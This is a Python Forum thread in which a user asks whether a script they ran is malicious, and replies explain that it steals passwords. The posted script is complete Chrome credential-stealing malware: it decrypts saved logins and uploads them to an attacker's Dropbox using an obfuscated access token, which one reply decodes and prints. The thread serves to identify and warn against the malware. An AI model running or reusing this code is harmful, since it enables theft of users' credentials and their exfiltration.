Python Forum
Help! I accidentally ran a file without checking the code
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Help! I accidentally ran a file without checking the code
#1
So I accidentally ran this file today, and didnt check the python code. Can anybody tell me if this code is malicious?
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")
Larz60+ write Dec-25-2020, 11:46 AM:
Please post all code, output and errors (it it's entirety) between their respective tags. Refer to BBCode help topic on how to post. Use the "Preview Post" button to make sure the code is presented as you expect before hitting the "Post Reply/Thread" button.
Fixed for you this time. Please use code tags on future posts.
Reply
#2
Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.
metulburr likes this post
Reply
#3
I had this issue too but after some code analyses I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).
metulburr likes this post
Reply
#4
Hm, the hacker should have used Pathlib and his hack works only on Windows.

  1. Getting master key from Chrome
  2. Copy Login Data to another place (Chrome locks the database)
  3. Iterating over the SQL SELECT of logins and password, saving line by line in a text file rc.txt. Using the masterkey to decrpyt.
  4. Sending the rc.txt to a Dropbox account
  5. deleting the rc.txt and the copy of the login database.

One thing is strange. From where comes the module Dropbox?
This hack can only work, if the dropbox dependency is installed in your current Python Interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
metulburr likes this post
Almost dead, but too lazy to die: https://sourceserver.info
All humans together. We don't need politicians!
Reply
#5
(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Probably you can report them. It most likely violates Dropbox ToS.
If you can't explain it to a six year old, you don't understand it yourself, Albert Einstein
How to Ask Questions The Smart Way: link and another link
Create MCV example
Debug small programs

Reply
#6
They are investigating now but the team is not allowed to visit external urls.
So, I provided them also with source code today.
buran likes this post
Almost dead, but too lazy to die: https://sourceserver.info
All humans together. We don't need politicians!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  embold code checking site zahhak 1 1,643 Sep-08-2021, 02:39 PM
Last Post: Larz60+
  Iterating over a dictionary in a for loop - checking code has worked sallyjc81 1 1,884 Dec-29-2020, 05:14 PM
Last Post: ndc85430

Forum Jump:

User Panel Messages

Announcements
Announcement #1 8/1/2020
Announcement #2 8/2/2020
Announcement #3 8/6/2020